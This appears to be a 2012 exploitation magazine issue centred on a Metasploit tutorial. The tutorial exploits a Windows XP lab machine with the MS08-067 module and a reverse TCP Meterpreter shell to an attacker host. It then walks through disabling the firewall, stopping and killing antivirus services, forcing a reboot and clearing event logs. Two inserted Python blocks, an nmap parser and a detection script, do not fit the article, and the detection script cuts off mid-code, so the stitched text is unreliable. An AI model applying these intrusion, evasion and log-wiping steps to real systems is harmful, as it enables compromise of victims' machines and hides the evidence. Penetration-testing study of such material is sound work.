exploitmag_01_2012


Atola Insight. That's all you need for data recovery.

Atola Technology offers Atola Insight – the only data recovery device that covers the entire data recovery process: in-depth HDD diagnostics, firmware recovery, HDD duplication, and file recovery. It is like a whole data recovery Lab in one Tool.

This product is the best choice for seasoned professionals as well as start-up data recovery companies.

• Case management

• Real time current monitor

• Firmware area backup system

• Serial port and power control

• Write protection switch

Get trained today through our exclusive 7-month hands-on course. Gain access to our complex LAB environment exploiting vulnerabilities across many platforms. Receive a trainer dedicated to you during the 7 months. 10 different hands-on engagements, 2 different certification levels.

Month 1 – Vulnerability Assessment – levels 1, 2 and 3
Month 2 – Network Penetration Testing – levels 1 and 2
Month 3 – Network Penetration Testing – level 3
Month 4 – Web Application Penetration Testing – levels 1 and 2
Month 5 – Web Application Penetration Testing – level 3
Month 6 – Certification Exam 1 – Certified Cyber 51 Pentesting Professional (CC51PP)
Month 7 – Certification Exam 2 – Certified Cyber 51 Pentesting Expert (CC51PE)

Editor's Note

The Exploit Magazine, August 2012

Dear All, If you are reading this, I presume that you trusted us and reached for the Exploitmag. Thank you for that. As you may see, we launched an entirely new project that targets all types of exploits – hence the name. This month, we host Abhinav Das and Sudhanshu Chauhan, who will expatiate on Metasploit. I genuinely hope that you will like our content and spread the word about us, so we can write for the wider public. In the near future, you can expect issues on: DoS Attacks, Security flaws on WSDL, SOAP. The hidden catch is that those issues will also be for free. Do not hesitate and subscribe to our magazine.

In case you have any: questions, suggestions, doubts – please, reach me at: [email protected] for more details.

Kindest Regards,
team

Editor in Chief: Grzegorz Tabaka [email protected]

Managing Editor: Michał Wiś [email protected]

Editorial Advisory Board: Rebecca Wynn, Matt Jonkman, Donald Iverson, Michael Munt, Gary S. Milefsky, Julian Evans, Aby Rao

Proofreaders: Michael Munt, Rebecca Wynn, Elliott Bujan, Bob Folden, Steve Hodge, Jonathan Edwards, Steven Atcheson, Robert Wood

Top Betatesters: Nick Baronian, Rebecca Wynn, Rodrigo Rubira Branco, Chris Brereton, Gerardo Iglesias Galvan, Jeff rey Smith, Robert Wood, Nana Onumah, Rissone Ruggero, Inaki Rodriguez

Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a The Exploit Magazine.

Senior Consultant/Publisher: Paweł Marciniak

CEO: Ewa [email protected]

Production Director: Andrzej Kuca [email protected]

DTP: Ireneusz Pogroszewski

Art Director: Ireneusz Pogroszewski [email protected]

Publisher: Software Press Sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.hakin9.org/en

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trademarks presented in the magazine were used only for informative purposes.

All rights to trade marks presented in the magazine are reserved by the companies which own them.

To create graphs and diagrams we used

program by

Mathematical formulas created by Design Science MathType™

DISCLAIMER! The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Metasploit

Metasploit Demystified – Introduction to the Metasploit Framework

By Abhinav Das – www.abhinavdas.in; @theabhinavdas

Have you ever wondered, have you ever given it a thought, that your IP (Internet Protocol) address is a very important identification of your computer and that it could actually put you, your sensitive data and your computer at risk of attack?

Did you know or even dream that somebody can gain Administrator-level access to your computer through the Internet with just your IP address? Did you know that just because you didn't update your Flash version the last time it prompted you to, you make your computer vulnerable to attack and exploitation? Just because you clicked the 'Remind me later' button the last time Flash Player asked you to update it, you put your computer at risk of being hacked? Yes, it is possible. And with the current level of technology and certain neat tools, it is very easy as well. Anybody who reads, understands and tries out what is in this issue of Hakin9 can do it. They can own somebody's Windows XP box remotely by running an exploit on it, through the Internet. After that, the rest is in their hands, depending on what kind of damage they wish to do. They may just decide to wipe out your operating system, they might decide to print tons of smileys on important office work, or they might just set up a keylogger/RAT (Remote Administration Tool) which records your keystrokes and sends them to a remote FTP server. Yes, this is very much possible, and hence it becomes very important to know how to conduct such an attack, so as to have a chance of blocking it.

During my visits to various colleges and institutions to deliver my seminars and workshops, I get bombarded by lots of questions. Amongst these questions is one which any penetration tester/ethical hacker should know the answer to: "How many stages or phases does a pentest have?" This question obviously can have multiple answers based on who the pentester is, what his objectives are and other criteria. But most of my hacker pals and I agree that there are 5 stages/phases of a successful and good hack. They are:

• Reconnaissance
• Scanning
• Gaining access (Exploitation)
• Maintaining access
• Covering tracks

Of the above-mentioned stages, this issue of Hakin9 will concentrate on the third stage of a successful hack/penetration test – Exploitation.

Exploitation is the process of manipulating the behavior of software or applications to make them behave in an unpredictable fashion which was not intended by the developers. Exploitation is usually done through bugs/glitches/vulnerabilities in software or applications. Hackers who are specialized in the art of exploit-writing and exploit-development can find bugs in software and applications and write exploits for existing bugs. These exploits may be used by other hackers to gain various privileges on a remote target machine (Figure 1).

The Metasploit Framework, referred to as msf in later parts of this issue, is a part of the Metasploit Project. The Metasploit Framework, in all its simplicity, is a framework consisting of a large number of community-written exploits which are updated from time to time. Metasploit provides an easy-to-use, easy-to-maintain, easy-to-code exploit development environment. It is so simple to use that it is a must-have for newbie hackers. Metasploit also currently has a GUI which makes using it all the more simple.

Metasploit was originally written in Perl, but has been completely rewritten in Ruby. It was created by HD Moore, and was sold to a security company – Rapid7 – in 2009.

In 2011, Rapid7 introduced and released a free community version of the product – Metasploit Community Edition, which is a free web-based interface for Metasploit.

There are many other versions of the Metasploit Framework – Metasploit Express and Metasploit Pro. Metasploit Pro is the best amongst these. However, it is commercial, and the free version is a 7-day trial.

If you are in the field of computer/network security, there must have been a point in time when you heard of or even used the Metasploit Framework.

It is a must-have for most penetration testers as it makes our jobs easier. For those of you that have just heard about the Metasploit Framework but didn't find it very useful, I'll be talking about it in the next few pages and drawing up many of its uses which will amaze you (for sure) and get you more interested in computer security.

The Metasploit Framework comes in many different forms. But the most widely used are the msfconsole and Armitage (its graphical interface). For those that are not very comfortable with the CLI, Metasploit now ships with a new GUI – Armitage. Armitage does one thing for sure: it makes the job of penetration testing very easy by adding a GUI to the Metasploit Framework.

The ability to combine any exploit with any payload, hence giving an environment which is extremely flexible and easy to use, is one of the best features of Metasploit.

The great thing about Metasploit, which makes it different from a lot of other amazing tools, is that it can run on almost any platform. It runs on all versions of Unix (including Linux and Mac OS X). Apart from *nix environments, Metasploit also runs on Windows!

Before going into the first example and demo of the Metasploit Framework and its usage, I would like to talk about three things which have to be clear to every aspiring hacker and penetration tester.

Figure 1. Metasploit Framework Logo

• Vulnerability
• Exploit
• Payload

What is a Vulnerability?

Vulnerabilities are side-effects which are a result of programming flaws/design flaws/implementation flaws. Most common are vulnerabilities that are created due to programming flaws. Vulnerabilities are weaknesses which are caused by any or many of the mentioned reasons. Vulnerabilities leave a system open to exploitation by hackers. They are loopholes that give an attacker access into your computer.

What is an Exploit?

An Exploit is a sequence of commands/code which takes advantage of a vulnerability to cause unexpected behavior, which is not planned by the person that designed and coded the software/system. This is, obviously, the definition of 'exploit' as a noun, not a verb. The verb form of 'exploit' would mean putting an exploit into action and actually exploiting the system.

What is a Payload?

Simply defined, a payload is the part of malicious code or an exploit that actually performs a destructive operation, and takes advantage of a vulnerability.

After understanding these terms, it might be useful to give you the basic steps of exploiting using the Metasploit Framework, just to demonstrate that it is really easy to use Metasploit. Metasploit is as close as it comes to having a point, click and exploit interface.

• Choose and configure an exploit.
• Check if the target is vulnerable/susceptible to the chosen exploit.
• Choose and configure a payload.
• Execute the payload.

Note: Optionally, some people perform a step between 3 and 4, which can be called 3.5, which is to encode the payload so that an IPS (Intrusion Prevention System)/IDS (Intrusion Detection System) will not be able to catch the payload.

Now, let's get to the interesting part. Whenever you try to learn a foreign language, you learn it by starting to speak it, starting to use it. The same applies to the technology world and technology-related things and subjects. You have to start using them, applying them in real-life scenarios to actually become good with them. Hence, at this stage of the tutorial, I would like to walk you through an actual exploitation, so you know how to run and use Metasploit. I usually suggest people use Linux while trying to hack; the environment is amazing and makes everything very easy to do. The current demo will be on a Linux environment. If you don't already know Linux, don't panic! Just do everything, step by step, as written, and you'll be fine.

Figure 2. BackTrack 5 Login Prompt

A lot of people wonder what OS to use, what OS to start off with. There are many free Linux distributions available for immediate download as ISOs. The great thing about ISOs is that you can either use them in a virtual machine, or you can burn them onto a DVD, making a Live DVD, or you can use a tool like Unetbootin to make a bootable pendrive with that ISO.

The current most preferred Linux distribution used for penetration testing is BackTrack 5. BackTrack 5 is a Linux distribution based on the Debian GNU distro. It is used for digital forensics and penetration testing mainly because of the numerous tools that it has, all pre-installed and pre-set-up, ready to use. You may not use all of the tools on BackTrack 5 but you sure will use some. I personally suggest getting BackTrack 5 due to its ease of use. It also has the Metasploit Framework pre-installed.

The latest version of BackTrack – BackTrack 5, comes in many flavours. It can be downloaded from http://www.backtrack-linux.org/downloads/.

Now, there are two options with the BackTrack 5 GNOME 32-bit version. You can choose to download it as an ISO or as a VMWare Image. Downloading it as an ISO will give you multiple usages, as I have mentioned above. But if you're planning on using BackTrack 5 as a Virtual Machine, running over your existing OS, I suggest downloading the VMWare Image. This image has VMWare Tools pre-installed, hence easing up the installation process for you. Now, you can use VMWare Player or VMWare Workstation to run BackTrack 5. I personally prefer and suggest VMWare Workstation. It is an amazing piece of software, very nice, very clean, extremely easy to use.

Figure 3. Logging into the Graphical Interface using the 'startx' command

Figure 4. Navigating to the Metasploit menu on BT5 32-bit GNOME

So, let me jot down the steps to download and run BackTrack 5:

• Download the BackTrack 5 ISO/VMWare Image from http://www.backtrack-linux.org/downloads/.

• Download Unetbootin, if you want to create a bootable usb-stick.

• Download VMWare Player/VMWare Workstation if you want to run BackTrack 5 as a Virtual Machine.

• If you want to create Live Usb Install, follow the steps mentioned here – http://www.backtrack-linux.org/tutorials/usb-live-install/.

• If you want to use the VMWare Image, just extract the contents of the file that you downloaded to any directory. You will find a .vmx file. Double click it; it should open in the virtualization software that you downloaded.

• Run the Virtual Machine/Reboot into the Live USB.

• Congratulations, your attacker system is ready.

Note: Running a Live USB has a disadvantage, which is that you would now require another computer on the local network running the target box specifications. If you use virtualization software like VMWare Workstation, then you can have the target OS running as another virtual machine inside VMWare Workstation, and both attacker and target operating systems will be on top of your host operating system. I prefer it that way, but you can do what you feel comfortable doing.

If you have set up everything as instructed, you will have booted into BackTrack 5 either as a Virtual Machine or as a Live USB. Now, you should see a lot of text appearing on a Command Line Interface (CLI) on the screen, to show that BackTrack is booting. Wait for the login prompt, which looks like this: Figure 2.

You should see something similar to the above picture. When you are prompted to enter the login details, you should enter root and toor as the username and password respectively. After logging in, you should see something like the screen below. To start X Windows, type startx as shown in Figure 3.

After booting into BackTrack 5, you would need to navigate to the Metasploit Framework menu. I'm currently using a BackTrack 5 32-bit GNOME VMWare Image on VMWare Workstation. Here, you need to navigate to Applications > BackTrack > Exploitation Tools > Network Exploitation > Metasploit Framework (Figure 4).

Here, you'll have four options: (1) Armitage, (2) msfcli, (3) msfconsole, (4) msfupdate. You can select option (3) msfconsole from the menu.

Another way of accessing the Metasploit Framework is by opening up a terminal and typing – /pentest/exploits/framework3/msfconsole. Either way, you should see something like this (Figure 5).

Now, if you are uncomfortable with using a command line interface, Metasploit now ships with Armitage – a GUI for Metasploit. You can access Armitage through the menus, as I have shown, and select (1) Armitage, or you can start it from the command line. Armitage can be started by opening the terminal and typing /pentest/exploits/framework3/armitage.

Figure 5. msfconsole


Note: You should have an instance of Metasploit already running. If you do, click 'Connect.' If you do not already have Metasploit running, click 'Start MSF,' which starts the Metasploit service and also connects Armitage to it.

Once Armitage is up and running, you should have something like this: Figure 6.

Good, you're done setting up the attacker machine. Now, it's time to set up the target machine.

For the target machine, I would like you to set up Windows XP SP2 to test against. It will be a very interesting and fun exercise if you can set up Windows XP SP2 on your Virtualization Software. Most people would have a Windows XP CD lying around somewhere; if you don't, you can always download either the ISO or the VMWare Image from torrents and other places. Also, if you can't find the right file to download, a lot of people suggest downloading it from here – http://nvd.nist.gov/fdcc/index.cfm.

Note: If you download it from NIST, you will have to remove all the patches that are installed in the VM. You can extract the contents and run it. The username / password scheme for the image is Renamed_Admin / P@ssw0rd123456.

I won’t include any screenshots for this process though. This is something that is easily ‘google-able.’ And most of you should know how to install Windows XP on your machine, so that shouldn’t be much of a problem.

Figure 6. The Armitage interface

Figure 7.


Windows XP Post Install:

• Turn Windows Firewall 'Off.'
• Turn off Windows updates.
• Open 'Security Center,' select 'Change the way Security Center alerts me,' and deselect all.
• In the control panel, go to 'Tools,' then 'Folder Options.' Select the 'View' tab, scroll to the bottom and un-check the box next to 'Use simple file sharing.' Save changes by clicking 'Ok.'

Now, some people tend to wonder and often ask me, "Why did we set up Windows XP SP2?" I say, "Let's start with something easy, just to break the ice." Once you are used to Metasploit and are familiar with the whole process of exploitation using Metasploit, everything else should automatically fall into place and become very easy for you to do.

So, let's start the attack. Power up both your BackTrack 5 Virtual Machine and your Windows XP SP2 Virtual Machine and let's get started.

Step 1

Find out the local IP address of the target/victim machine – which is the Windows XP machine. You can do this by going to the Windows XP Virtual Machine, opening up a command prompt and running ipconfig. That should give you something like this: Figure 7.

Step 2

You found the local IP address of your Windows XP Machine. What you now have to do is run an nmap scan from your attacker machine – BackTrack 5. To do this, open a terminal and type nmap -v -n <ip_address> (replace <ip_address> with the IP Address of your Windows XP machine). So, in this case, I would run nmap -v -n 192.168.0.101.

You will find some services running. We already know what services will be running, so we don't need to bother much about the output of that scan. Something that would concern us more is the version of the software running on those ports. For this, we can use the -sV flag on Nmap. So, the scan becomes nmap -sV -n <ip_address>.

Step 3

We already know what vulnerability exists on the Windows XP SP2 machine, so we will directly go to Metasploit and go through the process of running the exploit.

Step 4

We know the exploit to be used. We shall be using the exploit/windows/smb/ms08_067_netapi exploit. We can do this by opening up msfconsole and typing use exploit/windows/smb/ms08_067_netapi. After that, you should get something like this: Figure 8.

Step 5

So, currently, you are using the exploit called ms08_067_netapi, which Windows XP SP2 machines are vulnerable to. Next, you will have to select and set what payload you want to use. There are many payloads available for this exploit.

Figure 8. use exploit/windows/smb/ms08_067_netapi


Figure 9. Setting the payload if the exploit is successful

Figure 10. Show options


Note: I already know what exploit Windows XP SP2 machines are vulnerable to, hence I directly used the ms08_067_netapi exploit. But in normal, real-life situations, it is not so easy. You would need to use commands such as search in the MSF console to find exploits related to the services that the remote target is running. Once you find an exploit, you can use it by following the same steps. I repeat, I know for sure that Win XP SP2 is vulnerable to this exploit, and have thus used it. Do not try attacking an Apache machine with this exploit and ask me "Why isn't it working?"

If you are using an Apache box as a target, you can do a search on the MSFConsole to find exploits that might work on the Apache server. Another important thing is the version numbers of the services that are running on the victim.

To find the version numbers of the services on the target box, you will need to run a port scan on it. There are multiple tools to do this; I have demonstrated the use of one such tool, called nmap, earlier in this demonstration. There are various other tools to perform network mapping. You can see which one suits you best and use that. But nmap is considered the most powerful network mapping tool by industry standards.
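The version scan in Step 2 and the note above both come down to reading what nmap -sV reports per port. The following is an added example, not code from the article or from nmap itself: it parses nmap's grepable (-oG) output into a service inventory, flags hosts exposing NetBIOS/SMB, and collects the version strings the scan recovered. The scan text embedded in it is constructed to resemble a scan of the Windows XP SP2 lab box, not a captured result.

```python
"""Parse nmap -sV grepable output (-oG) into a per-host service inventory.

Added example for this article; not the author's code and not part of nmap.
Grepable output puts every port of a host on one "Host:" line, each entry
laid out as port/state/protocol/owner/service/rpc_info/version/ .
"""
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed sample: what "nmap -sV -n -oG - 192.168.0.101" might print for
# the Windows XP SP2 lab box. Not a captured scan.
SAMPLE_GREPABLE = (
    "# Nmap 5.51 scan initiated as: nmap -sV -n -oG - 192.168.0.101\n"
    "Host: 192.168.0.101 ()\tStatus: Up\n"
    "Host: 192.168.0.101 ()\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, "
    "139/open/tcp//netbios-ssn///, "
    "445/open/tcp//microsoft-ds//Microsoft Windows XP microsoft-ds/"
    "\tIgnored State: closed (997)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str      # nmap's service name, e.g. "microsoft-ds"
    version: str   # banner/version text, empty if -sV learned nothing


def parse_grepable(text: str) -> List[Service]:
    """Return one Service per port entry found on the Host:/Ports: lines."""
    services = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comment lines and Status-only lines carry no ports
        host = line.split()[1]
        # The Ports field ends at the next tab-separated field (Ignored State).
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 7:
                continue  # malformed entry: skip rather than guess
            port, state, proto, _owner, name, _rpc, version = fields[:7]
            services.append(Service(host, int(port), proto, state, name, version))
    return services


def exposed_smb(services: List[Service]) -> List[str]:
    """Hosts with NetBIOS/SMB (139, 445) open: the surface the MS08-067 demo needs."""
    return sorted({s.host for s in services
                   if s.state == "open" and s.port in (139, 445)})


def version_hints(services: List[Service]) -> Dict[str, Set[str]]:
    """Map host -> the OS/product strings -sV recovered from banners."""
    hints: Dict[str, Set[str]] = {}
    for s in services:
        if s.version:
            hints.setdefault(s.host, set()).add(s.version)
    return hints


if __name__ == "__main__":
    inventory = parse_grepable(SAMPLE_GREPABLE)
    for s in inventory:
        print(f"{s.host}:{s.port}/{s.proto} {s.state} {s.name} {s.version}")
    print("SMB exposed on:", exposed_smb(inventory))
    print("Version hints:", version_hints(inventory))
```

From the defender's side the same inventory answers the question the article's attacker asks: which hosts still expose SMB, and which banners date them to an unpatched Windows XP.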

We will be using the reverse_tcp payload by issuing the following command – set PAYLOAD windows/meterpreter/reverse_tcp. Now, we get something like this: Figure 9.

Step 6

Now, we have completed setting the payload. You can check the available options by doing show options. Like this: Figure 10.

Step 7

The worst is over! If you found that difficult, knock yourself out with a trout. Now, all that is remaining for you to do is set the RHOST and LHOST. RHOST is the IP Address of the target machine (which we found in step 1) and LHOST is the IP Address of the attacker (you can find that by doing ifconfig on your BackTrack machine, by opening another terminal). To set RHOST, you just need to type set RHOST <ip_address_of_target> and to set LHOST, you need to type set LHOST <ip_address_of_attacker>. After that, you should get something like this: Figure 11.

Step 8

Now, the last thing you need to do is type exploit. If you set up everything correctly, and didn't make any mistakes in setting RHOST and LHOST, you should be able to successfully exploit your Windows XP SP2 Machine. After a few lines, you should see the meterpreter> prompt. This shows that you've successfully hacked the remote machine and that your payload has successfully run. You can run the ps command to list the processes on the remote victim machine. You can view processes, kill processes, and do whatever you like to the target. I personally prefer doing a shutdown -s -t 0.

Back to the Basics

Now that you have some idea of how simple it is to use and run exploits using the Metasploit Framework, and now that you have tasted the simplicity and ease of running exploits, let us go back to the basics of Metasploit. We will discuss finer details of the Framework and talk about its various parts and their functions in a bit more detail.

Figure 11. Setting RHOST and LHOST


We will revisit the msfconsole, exploits, payloads and the meterpreter. We will talk about what they are, how they work and obviously, how to use them.

Msfconsole

Undoubtedly, the most popular MSF interface is the msfconsole. It acts as a centralised console and, though it may seem intimidating at first, is the best MSF interface to use. The reason it looks intimidating and scary is the obvious fact that you don't know the commands and don't have a GUI to help you (Figure 12).

There are various benefits of the msfconsole:

• Execution of external commands (Yes, you can use external commands!)

• Is very stable and contains the maximum number of features.

• Is a simple and clean way to access features of the Framework owing to full readline support, command completion and other things.

Launching (can be done in multiple ways):

• Navigating to msfconsole through the menu. Usually Applications > BackTrack > Exploitation Tools > Network Exploitation > Metasploit Framework.

• Opening a terminal and running msfconsole.

• Msfconsole is also located in /opt/framework3/msf3/ and /pentest/exploits/framework3/.

Note: By running msfconsole -h or msfconsole --help you can get various other options.

Due to the wide array of exploits out there, and the obvious difficulty of memorizing the location of each and every exploit, the Metasploit Framework has been kind enough to introduce 'Tab Completion.' As you know, in any shell, entering what you know and pressing 'Tab' will present you a list of options available for you to choose from, and when there is only a single option, it will auto-complete the string. MSF incorporated tab completion into almost all of its commands to help users navigate through it from the CLI. Some examples of tab completion as taken from the Offensive Security website are:

• use exploit/windows/dce
• use *.netapi.*
• set LHOST
• show
• set TARGET
• exp

Exploits

All of the exploits which are in the Metasploit Framework fall under two categories depending on how they work, and how they exploit, or rather, who they exploit.

These two classifications are:

• Active exploits
• Passive exploits

Active Exploits

These exploits attack specific targets or hosts. They attack based on the host that the attacker sets. The RHOST variable tells the MSF who to attack. The exploit attacks only that particular host and runs until completion and exits.

Figure 12. Msfconsole

Note: You can always send an active exploit to the background by passing the -j flag. Thus, after configuring the exploit, doing exploit -j will force the active module to the background.

A problem with active exploits is that they stop execution whenever an error is encountered (Figure 13).

This is an example of an active exploit which uses a set of previously gathered user credentials (Figure 14).

Passive Exploits

These exploits wait patiently for a victim to connect. In short, they exploit incoming hosts that connect to the attacker machine. Passive exploits usually focus on clients, including web browsers and FTP clients.

They can be used with email exploits to wait for connections and exploit any incoming host. They do not attack a particular target but exploit anybody that makes a connection to the attacking machine (Figure 15).

Figure 13. Using exploit -j

Figure 14. Example exploit

Figure 15.

Figure 16. Passive exploit of Cursor vulnerability

An example taken from the Offensive Security website is the use of the animated cursor vulnerability, which doesn't fire till a victim accesses a malicious website (Figure 16).

Payloads

As we have already discussed, payloads are code that is executed after an exploit successfully completes. Payloads are an interesting part of exploitation. Exploitation only lasts until you get into a system, but payloads are a part of post-exploitation. Payloads on MSF are of three types:

• Singles
• Stagers
• Stages

Singles

These are stand-alone payloads. They are the simplest to use. They could do anything from creating a new user on the target machine to just opening up the Calculator.

Stagers

These types of payloads are more commonly used, since they give more flexibility after exploitation. Stagers create a network connection between the attacker and the victim machines.

Stage

Stages are parts of a payload that are downloaded by Stager modules. The reason that Stages exist is that Stagers have size constraints. But once a Stager completes its run, it can download any of various Stages with no size limits, such as a Meterpreter, VNC injection, iPhone 'ipwn' shell etc.

Metasploit Meterpreter

Now that you know what exploits and payloads are, and since we have discussed the various types of payloads, it becomes easier to understand what the Metasploit Meterpreter is. It is a payload which uses DLL injection stagers. It communicates over the stager socket and establishes an excellent client-side Ruby API.

The Meterpreter is extremely stealthy and low-profile in a sense. This is mainly because it resides entirely in the target machine's memory and is never written to the disk. Meterpreter injects itself into compromised processes running on the target machine, which is another great aspect since it allows the Meterpreter to infect and migrate to other processes with ease. Apart from all this, the Meterpreter uses encrypted communication by default. The Meterpreter is designed to leave as little information or evidence on the compromised target host as possible.

Meterpreter can be extended and new features can be added to it without having to rebuild it completely. Features can be added to the Meterpreter by loading extensions. The process of extending it is very simple and seamless and takes minimal time to complete.

Some basic Meterpreter commands are:

Command      Function
help         Shows the available commands and their uses as a help menu.
background   Sends the current Meterpreter session to the background and returns you to the msf prompt.
getuid       Retrieves the UID (User ID) that the Meterpreter server is running as on the host.
ls           Lists the files in the cwd (current working directory).
download     Downloads a file from the remote machine.
upload       Uploads a file to the remote machine.
execute      Executes a command on the remote target machine.
shell        Invokes a standalone shell on the target machine.
idletime     Displays the amount of time that the remote user has been idle.
hashdump     Dumps the contents of the SAM file/database.
ps           Displays a list of running processes on the victim's machine.

Now that you have understood the Meterpreter and know some of the basic commands, it is time to see what can be done to a remote target in a real-life scenario. If we get into a system that we want to attack, I doubt we will try to shut it down, or open up an instance of the Calculator application. We would want to do something more.

Figure 17. Meterpreter session is running

How to remain hidden (Ninja techniques to apply, post-exploitation)

We have discussed various things; we have gone through the procedure of attacking a remote host using MSF. We have configured the exploit and used it. You have been introduced to various types of exploits and payloads. You have also been told about the Meterpreter, its uses, some simple commands and what it can do.

Now, we move on to another interesting part of hacking, which is important for all serious hackers and pentesters to know. It is generally called 'covering your tracks.' That is, the ability to hack and work undetected. Firewalls and anti-viruses pose a threat to hackers. Firewalls, if properly configured, can block an attack quite efficiently. Anti-viruses can detect your activities and create hurdles.

So, we have covered exploitation and gaining ac-cess to a remote host running the Windows XP SP2 operating system. Now, we shall cover another im-portant part of that attack, which is, disabling fire-walls and killing anti-viruses.

For this demonstration, we will use the Windows Firewall and AVG 2012 as the anti-virus.

We left off the last demonstration at the Meterpreter session. You can understand that the exploit was successful and that you are in a meterpreter session by looking for the meterpreter> prompt (Figure 17).

The above image shows that we have successfully exploited the target, and that a Meterpreter session has started.

If you recall the simple Meterpreter commands that I have tabulated earlier, you will remember the command – shell. It is used to get a shell on the remote system. So let us run the shell command at the Meterpreter prompt. On doing so, we get something like this: Figure 18.

Now, we have a remote shell on the victim computer. The next step would obviously be checking if the target system has its Firewall running.

Now that we have a shell on the target computer, we can easily verify whether its Firewall is running using the command netsh firewall show opmode. That should give you something like this: Figure 19.

On looking at the output of the command, we can easily understand that the firewall is enabled. The next step is a no-brainer. We would like to disable the Firewall. Disabling the firewall is easy from the shell, hence, we’re not going to exit the shell and return to our Meterpreter session just yet. The command that can be used to disable the firewall is – netsh firewall set opmode mode=disable. This command, when run from the shell on the remote host, will disable the Firewall. So, you must run the command (Figure 20).

Figure 18. Getting a remote shell

Figure 19. Checking if Firewall is running on target

Figure 20. Disabling the firewall

The ‘Ok.’ at the end of the output tells you that the command you have run has completed successfully. That is a very good sign. Sometimes, you might not have the Administrator privilege on the box, and you might need to perform some privilege escalation to get a shell with Administrator rights.

But again, the process is the same, and running the above command will surely disable the Windows Firewall.

This screen-shot, taken on the target machine, shows that the Windows Firewall has been successfully disabled (Figure 21).

Great! So, the Firewall has been disabled. That is one guard down for the target machine. Now, we can proceed to disabling and killing the anti-viruses running on the target box. For now, we can exit the remote shell, and go back to the meterpreter session by using the exit command.

Luckily, killing anti-viruses isn’t as tough to do as it was a long time ago. Meterpreter has a custom script that makes that job very easy. All you have to do is use the command run killav. Killav is the name of the script, which probably is an abbreviation for ‘Kill Anti-viruses.’ This automates the process of killing an anti-virus, so, run the command, sit back, and wait for it to complete (Figure 22).

Now, you’ll see a list of processes that have been killed by the killav script. If you look at the output, you’ll notice that it killed a process called avgrsx.exe. But did it really kill the anti-virus? You can have a look at the source-code of the killav script to understand what it actually does. You will see that the script has a list of process names, which it matches to the processes running on the target machine and kills them. So, now comes the big question, was the AVG anti-virus really killed?

Figure 21. Firewall is successfully disabled

Figure 22. Running Meterpreter’s killav script

Figure 23. Output of the tasklist command

Figure 24. Categorizing tasklist output

Figure 25. Shortlisting tasklist output

Figure 26. Process info

For understanding this, we would need to revisit the remote host by opening a shell on it. To do that, run the command shell. Now, to get a list of processes running on the machine, you can run the command tasklist. On running the command, you will get output that looks a lot like this: Figure 23.

In the output created by running the tasklist command, you will notice process names starting with ‘avg.’ So that means, the killav script didn’t really kill the antivirus.

If you want to see what service the processes belong to, you can run tasklist /svc. This gives the same list of processes, with the service that they run. You should get something like this: Figure 24.

This is only to categorize the tasklist. Now, since we are only interested in the ‘avg’ tasks that are running, we can run the command – tasklist /svc | find /I "avg". This tells the target computer to list running processes whose names start with ‘avg.’ Now, you should get a shorter list that looks like this: Figure 25.

Now, after some trial and error, we notice that the avgwd service and the avgidsagent service keep restarting the other processes even if we kill them. This tells us that these are the two main processes and the most suspicious. Anti-virus companies usually tend to start so many processes so as to confuse the attacker on which is the main process that controls the rest. Let us now take a closer look at avgwd and avgidsagent. We can do this by running the command – sc queryex <process>, like shown below: Figure 26.

If you notice in the output of the process description of both these processes, you will see, written, NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN. That tells us that the processes cannot be stopped or paused. That is a drawback, yes, but it also gives us a hint on what should be our course of action.

So now, we will try to disable the processes from auto-starting at reboot, so that they will not start when we reboot the host machine. We can do that by using the command sc config <process> start=disabled. You should do that for both the processes – avgwd and avgidsagent (Figure 27).

Now, the next step, is debatable, and is not very neat. There are multiple options for us right now, we can reboot the system or wait for the user to reboot the system. Since this is just a tutorial on disabling the firewall and anti-virus, and since it is not a real pentest, I’m going to go ahead with the bad route, which I suggest none of you take – I’ll reboot the system. You can do this by giving the command shutdown -r -t 0 or you can exit the shell, come back to your meterpreter session and use the command reboot.

Figure 27. Disabling the main AV processes from auto-starting at boot-time

Figure 28. Main avg processes not running

Figure 29. Kill remaining avg processes

Figure 30. Using the clearev script

Figure 31. Proof that clearev worked

Now, wait for the computer to reboot. After it has, examine the system for any ‘avg’ processes that are running using the command tasklist /svc | find /I "avg". You should see this: Figure 28.

There are now only three processes running instead of five. The two processes that we disabled are not running, that means we can kill these three processes without any problem. To do that, we can use taskkill /F /IM "avg". This command kills processes that are running whose name has ‘avg’ (Figure 29).

Congratulations. You have successfully disabled the Firewall and killed the Anti-virus. Now, you can continue doing whatever you like, without the fear of interruption from either.

Note

A lot of hackers like to automate this whole process and write scripts with commands. Scripts that can be run with certain flags. They code them as extensions to the meterpreter. If you are good at coding, you can give that a shot as well.

Another thing, that some people like to do, which I always suggest you do, after you finish whatever you need to on the target machine is – clearing logs. Again, MSF helps us with this, since it has a built-in script called clearev which clears all the system log files. You can use that, by exiting the shell, and going back to the meterpreter session. Run the clearev script (Figure 30).

The next screen-shot has been taken on the target machine after running the clearev script (Figure 31).
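The same chain (firewall switched off, AV services set to disabled, forced reboot, AV processes killed, logs cleared) is exactly what a defender should be alerting on. As an added example that is not part of this article, the following Python script runs one detection rule per command shown above over a constructed, simplified event stream and correlates the hits per host; the log format, host names and timestamps are constructed, while the Windows event IDs it relies on (4688 or 592 for process creation, 1102 and 104 for a cleared Security or System log) are real.

```python
"""Detection logic for the defense-evasion sequence described above.

Added example (not part of the article). It scans a constructed,
simplified event stream, one event per line:
  <ISO timestamp> host=<name> event=<id> [cmd=<command line>]
Process-creation events use the real Windows IDs 4688 (Vista+) or 592
(XP/2003); 1102 and 104 are the real IDs Windows writes when the
Security or System log is cleared (which is what clearev causes).
"""
import re
from datetime import datetime, timedelta

PROCESS_CREATED = {"4688", "592"}
LOG_CLEARED = {"1102": "security_log_cleared", "104": "system_log_cleared"}

# Process-name prefixes of the AV product in use; "avg" is the prefix
# from the article. Extend for the product deployed on your hosts.
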